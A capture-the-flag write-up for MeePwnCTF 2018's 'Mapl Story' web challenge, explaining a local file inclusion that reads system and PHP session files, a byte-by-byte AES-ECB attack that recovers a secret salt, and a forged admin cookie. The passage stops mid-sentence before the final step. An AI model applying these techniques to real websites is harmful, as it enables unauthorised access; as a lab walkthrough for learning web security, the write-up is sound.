# Mapl Story Mapl Story was part of the MeePwnCTF Quals 2018 and consists of a webpage where you can name a "character" and train a pet a command. You get the code but the config is censored. ## Have a look around First of let's create an account, e.g. [email protected]/foobar123, set any name, we'll change that later. Sign in and have a look at your cookies, you'll see your PHPSESSID and a `_role`. `_role` is generated using either `sha256("admin".$salt)` or (in this case) `sha256("user".$salt)`. We need the salt to continue here. Have a look around the few pages on the site. The game page is completely irrelevant, just a gimmick. ## File inclusion vulnerability There is a file inclusion vulnerability in index.php, so have a look at e.g. `/index.php?page=/etc/group`. Unfortunately it uses a GET variable which is heavily escaped so for now there isn't really much we can directly do with this bug. ## Let's get salty Let's have a look at `/index.php?page=/var/lib/php/sessions/sess_PHPSESSID` (replace PHPSESSID). You'll see a variable called `character_name`. `character_name` is AES-128-ECB encrypted data using `openssl_encrypt($data.$salt,"AES-128-ECB",$key)`. Since AES-128-ECB is working on 16-byte blocks and we control the start of the string (it's the character name you can update on your settings page!) we can attack it by brute-forcing byte by byte. We start of setting a character name like `AAAAAAAAAAAAAAA` (15x'A') and we'll look at the first 32 characters of the hash in the session file, now we start trying printable characters at the 16. position, we'll find a hash match at `AAAAAAAAAAAAAAAm` so we now the salt starts with `m`. Next we do the same thing with `AAAAAAAAAAAAAA` (14x'A') and will get the hash and try characters again, the next match will be `AAAAAAAAAAAAAAms`. We'll continue this until we finally get the salt: `ms_g00d_0ld_g4m3`. ## Becoming admin Becoming admin now is as simple as writing the result of `sha256("admin"."ms_g00d_0ld_g4m3")` into our `_role` cookie. After refreshing the page you'll see the admin link appearing in the navigation bar. `sha256("admin"."ms_g00d_0ld_g4m3") => a2ae9db7fd12a8911be74590b99bc7ad1f2f6ccd2e68e44afbf1280349205054` ## Give yourself a pet In the admin menu you have to give yourself a pet. This will allow you to train it commands on the character page, which is just writing a text-file under `"uploads/".md5($salt.$email)."/command.txt`. A lot of characters are filtered and you can only write 19 characters, so you can't really do much with this alone. 19 characters is just barely long enough to fit a base64-encoded ``` Original writeup (http://blog.redrocket.club/2018/07/15/meepwn- quals-2018-maplstory/).